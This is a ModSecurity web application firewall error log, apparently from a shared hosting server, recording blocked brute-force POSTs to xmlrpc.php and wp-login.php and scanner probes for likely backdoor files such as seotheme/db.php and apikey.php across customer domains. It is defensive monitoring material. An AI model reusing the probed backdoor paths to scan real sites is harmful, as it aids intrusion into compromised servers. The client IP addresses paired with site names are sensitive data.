[Tue May 26 15:46:47.059161 2026] [security2:error] [pid 747840:tid 748082] [client 202.28.194.139:35286] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "202.28.194.139" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVzD4m6MwAuYuZKxvnkJAAAAXo"], referer: http://www.bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 15:46:47.059247 2026] [security2:error] [pid 747840:tid 748082] [client 202.28.194.139:35286] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVzD4m6MwAuYuZKxvnkJAAAAXo"], referer: http://www.bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 15:46:47.088207 2026] [security2:error] [pid 745492:tid 745730] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzDomEQglTmoWcfxJyWAAAAO4"]
[Tue May 26 15:46:48.304659 2026] [security2:error] [pid 745492:tid 745674] [client 88.151.32.54:56878] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy-ImEQglTmoWcfxJxNQAAALY"]
[Tue May 26 15:46:48.337497 2026] [security2:error] [pid 745492:tid 745696] [client 88.151.32.54:56890] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy-ImEQglTmoWcfxJxJQAAAMw"]
[Tue May 26 15:46:49.198184 2026] [security2:error] [pid 747840:tid 748075] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzEIm6MwAuYuZKxvnkQwAAAXM"]
[Tue May 26 15:46:49.280065 2026] [security2:error] [pid 745492:tid 745675] [client 88.151.32.54:56856] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy-ImEQglTmoWcfxJxJgAAALc"]
[Tue May 26 15:46:50.286605 2026] [security2:error] [pid 747840:tid 748048] [client 88.151.32.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy-Im6MwAuYuZKxvniXgAAAVg"]
[Tue May 26 15:46:50.339989 2026] [security2:error] [pid 747840:tid 748072] [client 88.151.32.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy-Im6MwAuYuZKxvniWAAAAXA"]
[Tue May 26 15:46:50.402134 2026] [security2:error] [pid 745492:tid 745639] [client 88.151.32.54:56854] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy-ImEQglTmoWcfxJxMQAAAJM"]
[Tue May 26 15:46:50.415024 2026] [security2:error] [pid 747840:tid 748057] [client 88.151.32.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy-Im6MwAuYuZKxvniTwAAAWE"]
[Tue May 26 15:46:50.737026 2026] [security2:error] [pid 745492:tid 745742] [client 20.29.64.60:2756] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-plain.php"] [unique_id "ahVzEomEQglTmoWcfxJylAAAAPo"], referer: www.google.com
[Tue May 26 15:46:50.782480 2026] [security2:error] [pid 745492:tid 745685] [client 20.29.64.60:2776] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVzEomEQglTmoWcfxJymgAAAME"], referer: www.google.com
[Tue May 26 15:46:51.167069 2026] [security2:error] [pid 745492:tid 745676] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzEomEQglTmoWcfxJylQAAALg"]
[Tue May 26 15:46:51.276494 2026] [security2:error] [pid 747840:tid 748046] [client 88.151.32.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy-Im6MwAuYuZKxvniXAAAAVY"]
[Tue May 26 15:46:51.317609 2026] [security2:error] [pid 747840:tid 748040] [client 88.151.32.54:56864] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy-Im6MwAuYuZKxvniUwAAAVA"]
[Tue May 26 15:46:51.373185 2026] [security2:error] [pid 745492:tid 745707] [client 88.151.32.54:56880] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy-ImEQglTmoWcfxJxLQAAANc"]
[Tue May 26 15:46:51.478650 2026] [security2:error] [pid 745492:tid 745631] [client 88.151.32.54:56842] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy-ImEQglTmoWcfxJxMgAAAIs"]
[Tue May 26 15:46:51.499267 2026] [security2:error] [pid 747840:tid 748047] [client 88.151.32.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy-Im6MwAuYuZKxvniYAAAAVc"]
[Tue May 26 15:46:51.949268 2026] [security2:error] [pid 747840:tid 747971] [client 223.123.35.44:36214] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.35.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVzE4m6MwAuYuZKxvnkaAAAAQs"]
[Tue May 26 15:46:51.949449 2026] [security2:error] [pid 747840:tid 747971] [client 223.123.35.44:36214] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVzE4m6MwAuYuZKxvnkaAAAAQs"]
[Tue May 26 15:46:52.114184 2026] [security2:error] [pid 745492:tid 745730] [client 20.29.64.60:2768] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahVzEomEQglTmoWcfxJymQAAAO4"], referer: www.google.com
[Tue May 26 15:46:52.299290 2026] [security2:error] [pid 745492:tid 745665] [client 88.151.32.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy-ImEQglTmoWcfxJxOQAAAK0"]
[Tue May 26 15:46:52.309688 2026] [security2:error] [pid 747840:tid 748070] [client 88.151.32.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy-Im6MwAuYuZKxvniWQAAAW4"]
[Tue May 26 15:46:52.399155 2026] [security2:error] [pid 747840:tid 748085] [client 88.151.32.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy-Im6MwAuYuZKxvniXwAAAX0"]
[Tue May 26 15:46:52.417421 2026] [security2:error] [pid 745492:tid 745651] [client 20.29.64.60:2763] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahVzFImEQglTmoWcfxJyuwAAAJ8"]
[Tue May 26 15:46:52.438016 2026] [security2:error] [pid 747840:tid 748049] [client 88.151.32.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy-Im6MwAuYuZKxvniXQAAAVk"]
[Tue May 26 15:46:52.462782 2026] [security2:error] [pid 747840:tid 748069] [client 88.151.32.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVy-Im6MwAuYuZKxvniZAAAAW0"]
[Tue May 26 15:46:53.203948 2026] [security2:error] [pid 745492:tid 745629] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzFImEQglTmoWcfxJywwAAAIk"]
[Tue May 26 15:46:53.235353 2026] [security2:error] [pid 745492:tid 745669] [client 20.29.64.60:2768] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahVzFImEQglTmoWcfxJyuAAAALE"], referer: www.google.com
[Tue May 26 15:46:55.167418 2026] [security2:error] [pid 747840:tid 747978] [client 43.173.173.100:48006] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahVzFom6MwAuYuZKxvnkkAAAARI"], referer: http://www.srsglobalsoft.com/
[Tue May 26 15:46:55.342261 2026] [security2:error] [pid 747840:tid 748000] [client 143.110.243.118:40400] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/wp-contentt.php"] [unique_id "ahVzF4m6MwAuYuZKxvnknAAAASg"]
[Tue May 26 15:46:55.388211 2026] [security2:error] [pid 747840:tid 748046] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzFom6MwAuYuZKxvnkmQAAAVY"]
[Tue May 26 15:46:55.673447 2026] [security2:error] [pid 747840:tid 748002] [client 20.29.64.60:2757] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/cnaahndv.php"] [unique_id "ahVzF4m6MwAuYuZKxvnknQAAASo"], referer: www.google.com
[Tue May 26 15:46:55.921120 2026] [security2:error] [pid 747840:tid 747971] [client 20.29.64.60:2771] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahVzF4m6MwAuYuZKxvnkogAAAQs"]
[Tue May 26 15:46:56.366597 2026] [security2:error] [pid 747840:tid 748032] [client 103.153.130.62:62356] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVzGIm6MwAuYuZKxvnkqwAAAUg"]
[Tue May 26 15:46:56.366774 2026] [security2:error] [pid 747840:tid 748032] [client 103.153.130.62:62356] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVzGIm6MwAuYuZKxvnkqwAAAUg"]
[Tue May 26 15:46:56.775422 2026] [security2:error] [pid 747840:tid 748045] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzGIm6MwAuYuZKxvnkrAAAAVU"]
[Tue May 26 15:46:57.043044 2026] [security2:error] [pid 745492:tid 745633] [client 109.105.209.12:37548] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahVzGImEQglTmoWcfxJzEQAAAI0"]
[Tue May 26 15:46:57.177703 2026] [security2:error] [pid 747840:tid 747974] [client 109.105.209.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahVzGYm6MwAuYuZKxvnktAAAAQ4"]
[Tue May 26 15:46:57.576780 2026] [security2:error] [pid 747840:tid 748067] [client 109.105.209.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahVzGYm6MwAuYuZKxvnkuwAAAWs"]
[Tue May 26 15:46:57.739853 2026] [security2:error] [pid 747840:tid 748031] [client 20.29.64.60:2780] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVzGYm6MwAuYuZKxvnkwgAAAUc"], referer: www.google.com
[Tue May 26 15:46:59.533734 2026] [security2:error] [pid 747840:tid 748058] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzG4m6MwAuYuZKxvnk2wAAAWI"]
[Tue May 26 15:46:59.847467 2026] [security2:error] [pid 745492:tid 745703] [client 20.29.64.60:2771] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-plain.php"] [unique_id "ahVzG4mEQglTmoWcfxJzLgAAANM"], referer: www.google.com
[Tue May 26 15:47:00.272576 2026] [security2:error] [pid 745492:tid 745646] [client 20.29.64.60:2780] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahVzHImEQglTmoWcfxJzMgAAAJo"]
[Tue May 26 15:47:01.013643 2026] [security2:error] [pid 745492:tid 745702] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzHImEQglTmoWcfxJzQgAAANI"]
[Tue May 26 15:47:02.369504 2026] [security2:error] [pid 747840:tid 747974] [client 223.123.35.44:36215] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.35.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVzHom6MwAuYuZKxvnk8gAAAQ4"]
[Tue May 26 15:47:02.369668 2026] [security2:error] [pid 747840:tid 747974] [client 223.123.35.44:36215] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVzHom6MwAuYuZKxvnk8gAAAQ4"]
[Tue May 26 15:47:02.588507 2026] [security2:error] [pid 745492:tid 745707] [client 4.193.189.92:5792] ModSecurity: Warning. Pattern match "/1\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1543"] [id "900921"] [msg "temporary TUW-72162 logging rule"] [hostname "vishaal-shah.com"] [uri "/1.php"] [unique_id "ahVzHomEQglTmoWcfxJzYAAAANc"]
[Tue May 26 15:47:02.588659 2026] [security2:error] [pid 745492:tid 745707] [client 4.193.189.92:5792] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/1.php"] [unique_id "ahVzHomEQglTmoWcfxJzYAAAANc"]
[Tue May 26 15:47:03.377255 2026] [security2:error] [pid 747840:tid 748080] [client 4.193.189.92:2974] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/2.php"] [unique_id "ahVzH4m6MwAuYuZKxvnk_wAAAXg"]
[Tue May 26 15:47:03.703856 2026] [security2:error] [pid 747840:tid 747995] [client 20.29.64.60:2433] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/vcbytcfj.php"] [unique_id "ahVzH4m6MwAuYuZKxvnlBQAAASM"], referer: www.google.com
[Tue May 26 15:47:03.787278 2026] [security2:error] [pid 747840:tid 748081] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzH4m6MwAuYuZKxvnk_gAAAXk"]
[Tue May 26 15:47:03.876403 2026] [security2:error] [pid 747840:tid 748030] [client 20.29.64.60:2455] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahVzH4m6MwAuYuZKxvnlBgAAAUY"]
[Tue May 26 15:47:04.061019 2026] [security2:error] [pid 745492:tid 745601] [remote 209.145.62.147:56490] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.62.145.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/wp-login.php"] [unique_id "ahVzH4mEQglTmoWcfxJzcAAAl2k"]
[Tue May 26 15:47:04.126666 2026] [security2:error] [pid 747840:tid 748039] [client 4.193.189.92:1988] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/7.php"] [unique_id "ahVzIIm6MwAuYuZKxvnlCQAAAU8"]
[Tue May 26 15:47:04.915785 2026] [security2:error] [pid 745492:tid 745689] [client 4.193.189.92:9386] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/10.php"] [unique_id "ahVzIImEQglTmoWcfxJzggAAAMU"]
[Tue May 26 15:47:05.144723 2026] [security2:error] [pid 745492:tid 745638] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzIImEQglTmoWcfxJzfAAAAJI"]
[Tue May 26 15:47:05.709111 2026] [security2:error] [pid 745492:tid 745672] [client 4.193.189.92:6128] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/13.php"] [unique_id "ahVzIYmEQglTmoWcfxJzlAAAALQ"]
[Tue May 26 15:47:05.847088 2026] [security2:error] [pid 745492:tid 745750] [client 85.208.96.206:62518] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-kids-care/list/"] [unique_id "ahVzIYmEQglTmoWcfxJzlwAAAQI"]
[Tue May 26 15:47:05.847226 2026] [security2:error] [pid 745492:tid 745750] [client 85.208.96.206:62518] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-kids-care/list/"] [unique_id "ahVzIYmEQglTmoWcfxJzlwAAAQI"]
[Tue May 26 15:47:05.959503 2026] [security2:error] [pid 747840:tid 747977] [client 179.36.20.247:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzIYm6MwAuYuZKxvnlGQAAARE"]
[Tue May 26 15:47:06.493872 2026] [security2:error] [pid 745492:tid 745657] [client 4.193.189.92:8597] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/100.php"] [unique_id "ahVzIomEQglTmoWcfxJzogAAAKU"]
[Tue May 26 15:47:06.981012 2026] [security2:error] [pid 745492:tid 745732] [client 103.153.130.62:62645] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVzIomEQglTmoWcfxJzpQAAAPA"]
